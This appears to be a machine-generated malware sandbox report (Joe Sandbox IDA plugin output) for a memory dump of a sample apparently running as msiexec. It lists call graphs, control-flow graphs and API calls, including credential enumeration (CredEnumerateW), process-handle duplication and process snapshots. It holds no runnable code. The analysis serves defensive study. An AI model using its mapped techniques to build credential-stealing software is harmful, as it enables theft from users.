39939->39934 39940 4169a7 11 API calls 39939->39940 39941 42b5b5 memset memcpy 39939->39941 39942 42bf4c 14 API calls 39939->39942 39944 4165ff 11 API calls 39939->39944 39967 42b63e 14 API calls 39939->39967 39968 42bfcf memcpy 39939->39968 39940->39939 39941->39939 39942->39939 39944->39939 39946->39918 39971 43817e 39947->39971 39949 42ff9d 39949->39937 39950 42ff99 39950->39949 39951 42ffe3 39950->39951 39952 42ffd0 39950->39952 39976 4169a7 11 API calls 39951->39976 39975 4169a7 11 API calls 39952->39975 39956 415a9d 39955->39956 39957 415ab3 39956->39957 39958 415aa4 memset 39956->39958 39957->39937 39958->39957 40127 4165a0 39959->40127 39962->39937 39963->39937 39964->39937 39965->39937 39966->39939 39967->39939 39968->39939 39969->39928 39970->39934 39972 438187 39971->39972 39973 438192 39971->39973 39977 4380f6 39972->39977 39973->39950 39975->39949 39976->39949 39979 43811f 39977->39979 39978 438164 39978->39973 39979->39978 39982 437e5e 39979->39982 40005 4300e8 memset memset memcpy 39979->40005 40006 437d3c 39982->40006 39984 437eb3 39984->39979 39985 437ea9 39985->39984 39990 437f22 39985->39990 40021 41f432 39985->40021 39988 437f06 40068 415c56 11 API calls 39988->40068 39992 437f7f 39990->39992 39993 432d4e 3 API calls 39990->39993 39991 437f95 40069 415c56 11 API calls 39991->40069 39992->39991 39995 43802b 39992->39995 39993->39992 39997 4165ff 11 API calls 39995->39997 39996 437fa3 39996->39984 40072 41f638 103 API calls 39996->40072 39998 438054 39997->39998 40032 437371 39998->40032 40001 43806b 40002 438094 40001->40002 40070 42f50e 137 API calls 40001->40070 40002->39996 40071 4300e8 memset memset memcpy 40002->40071 40005->39979 40007 437d69 40006->40007 40010 437d80 40006->40010 40073 437ccb 11 API calls 40007->40073 40009 437d76 40009->39985 40010->40009 40011 437da3 40010->40011 40012 437d90 40010->40012 40014 438460 133 API calls 40011->40014 40012->40009 40077 437ccb 11 API calls 40012->40077 40017 437dcb 40014->40017 40015 437de8 40076 424f26 122 API calls 40015->40076 40017->40015 40074 444283 13 API calls 40017->40074 40019 437dfc 40075 437ccb 11 API calls 40019->40075 40022 41f44f 40021->40022 40023 41f54d 40021->40023 40024 41f466 40022->40024 40030 41f50b 40022->40030 40078 41f1a5 40022->40078 40103 41c06f memcmp 40022->40103 40104 41f3b1 89 API calls 40022->40104 40105 41f398 85 API calls 40022->40105 40023->40024 40107 41c635 memset memset 40023->40107 40024->39988 40024->39990 40030->40023 40030->40024 40106 41c295 85 API calls 40030->40106 40108 41703f 40032->40108 40034 437399 40035 43739d 40034->40035 40037 4373ac 40034->40037 40115 4446ea 11 API calls 40035->40115 40038 416935 16 API calls 40037->40038 40061 4373ca 40038->40061 40039 437584 40041 4375bc 40039->40041 40122 42453e 122 API calls 40039->40122 40040 438460 133 API calls 40040->40061 40123 415c7d 16 API calls 40041->40123 40044 4375d2 40048 4373a7 40044->40048 40124 4442e6 11 API calls 40044->40124 40045 4251c4 136 API calls 40045->40061 40047 4375e2 40047->40048 40125 444283 13 API calls 40047->40125 40048->40001 40050 415a91 memset 40050->40061 40053 43758f 40121 42453e 122 API calls 40053->40121 40056 4375f4 40059 437620 40056->40059 40060 43760b 40056->40060 40058 43759f 40062 416935 16 API calls 40058->40062 40064 416935 16 API calls 40059->40064 40126 444283 13 API calls 40060->40126 40061->40039 40061->40040 40061->40045 40061->40050 40061->40053 40067 437d3c 134 API calls 40061->40067 40116 425433 13 API calls 40061->40116 40117 425413 17 API calls 40061->40117 40118 42533e 16 API calls 40061->40118 40119 42538f 16 API calls 40061->40119 40120 42453e 122 API calls 40061->40120 40062->40039 40064->40048 40066 437612 memcpy 40066->40048 40067->40061 40068->39984 40069->39996 40070->40002 40071->39996 40072->39984 40073->40009 40074->40019 40075->40015 40076->40009 40077->40009 40079 41bc3b 100 API calls 40078->40079 40080 41f1b4 40079->40080 40081 41edad 85 API calls 40080->40081 40088 41f282 40080->40088 40082 41f1cb 40081->40082 40083 41f1f5 memcmp 40082->40083 40084 41f20e 40082->40084 40082->40088 40083->40084 40085 41f21b memcmp 40084->40085 40084->40088 40086 41f326 40085->40086 40089 41f23d 40085->40089 40087 41ee6b 85 API calls 40086->40087 40086->40088 40087->40088 40088->40022 40089->40086 40090 41f28e memcmp 40089->40090 40092 41c8df 55 API calls 40089->40092 40090->40086 40091 41f2a9 40090->40091 40091->40086 40094 41f308 40091->40094 40095 41f2d8 40091->40095 40093 41f269 40092->40093 40093->40086 40096 41f287 40093->40096 40097 41f27a 40093->40097 40094->40086 40101 4446ce 11 API calls 40094->40101 40098 41ee6b 85 API calls 40095->40098 40096->40090 40100 41ee6b 85 API calls 40097->40100 40099 41f2e0 40098->40099 40102 41b1ca memset 40099->40102 40100->40088 40101->40086 40102->40088 40103->40022 40104->40022 40105->40022 40106->40023 40107->40024 40109 417044 40108->40109 40110 41705c 40108->40110 40112 416760 11 API calls 40109->40112 40114 417055 40109->40114 40111 417075 40110->40111 40113 41707a 11 API calls 40110->40113 40111->40034 40112->40114 40113->40109 40114->40034 40115->40048 40116->40061 40117->40061 40118->40061 40119->40061 40120->40061 40121->40058 40122->40041 40123->40044 40124->40047 40125->40056 40126->40066 40132 415cfe 40127->40132 40137 415d23 __aullrem __aulldvrm 40132->40137 40139 41628e 40132->40139 40133 4163ca 40146 416422 11 API calls 40133->40146 40135 416422 10 API calls 40135->40137 40136 416172 memset 40136->40137 40137->40133 40137->40135 40137->40136 40138 415cb9 10 API calls 40137->40138 40137->40139 40138->40137 40140 416520 40139->40140 40141 416527 40140->40141 40145 416574 40140->40145 40143 416544 40141->40143 40141->40145 40147 4156aa 11 API calls 40141->40147 40144 416561 memcpy 40143->40144 40143->40145 40144->40145 40145->39937 40146->40139 40147->40143 40148 441819 40151 430737 40148->40151 40150 441825 40152 430756 40151->40152 40164 43076d 40151->40164 40153 430774 40152->40153 40154 43075f 40152->40154 40166 43034a memcpy 40153->40166 40165 4169a7 11 API calls 40154->40165 40157 4307ce 40158 430819 memset 40157->40158 40167 415b2c 11 API calls 40157->40167 40158->40164 40159 43077e 40159->40157 40162 4307fa 40159->40162 40159->40164 40161 4307e9 40161->40158 40161->40164 40168 4169a7 11 API calls 40162->40168 40164->40150 40165->40164 40166->40159 40167->40161 40168->40164 40169 41493c EnumResourceNamesW

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                      • API String ID: 708747863-3398334509
                                                                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 650 413e79-413e9d call 413959 call 413ca4 643->650 651 413e28-413e35 643->651 647 413ec8-413eda call 4099f4 644->647 648 413ebf-413ec6 free 644->648 652 413edb-413ee2 647->652 648->652 663 413ea2-413eae CloseHandle 650->663 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 656 413ee4 652->656 657 413ee7-413efe 652->657 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->650 663->642
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                                                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                      APIs
                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 142 44592d-445945 call 40b6ef 24->142 143 44594a 24->143 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 148 4459d0-4459e8 call 40b6ef 29->148 149 4459ed 29->149 30->21 39 445609-44560d 30->39 31->30 39->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->50 40->3 41->40 53 44584c-445854 call 40b1ab 43->53 54 445828 43->54 184 445b08-445b15 call 40ae51 45->184 55 445c7c-445c85 46->55 56 445b38-445b96 memset * 3 46->56 145 445665-445670 call 40b1ab 50->145 146 445643-445663 call 40a9b5 call 4087b3 50->146 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 53->13 69 44582e-445847 call 40a9b5 call 4087b3 54->69 63 445d1c-445d25 55->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 55->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 56->70 71 445b98-445ba0 56->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 131 445849 69->131 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 151 44589f 77->151 78->55 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 153 4456a9-4456b0 94->153 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->6 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 131->53 142->143 143->23 145->111 146->145 148->149 149->28 151->67 153->80 153->94 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 209 4456fd-445796 memset * 4 call 409c70 * 3 177->209 210 4457ea-4457f7 call 413d29 177->210 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 209->210 246 445798-4457ca call 40b2cc call 409d1f call 409b98 209->246 210->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->210 264 4457cc-4457e5 call 4087b3 246->264 247->55 265 445f4d-445f5a call 40ae51 248->265 254->179 264->210 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
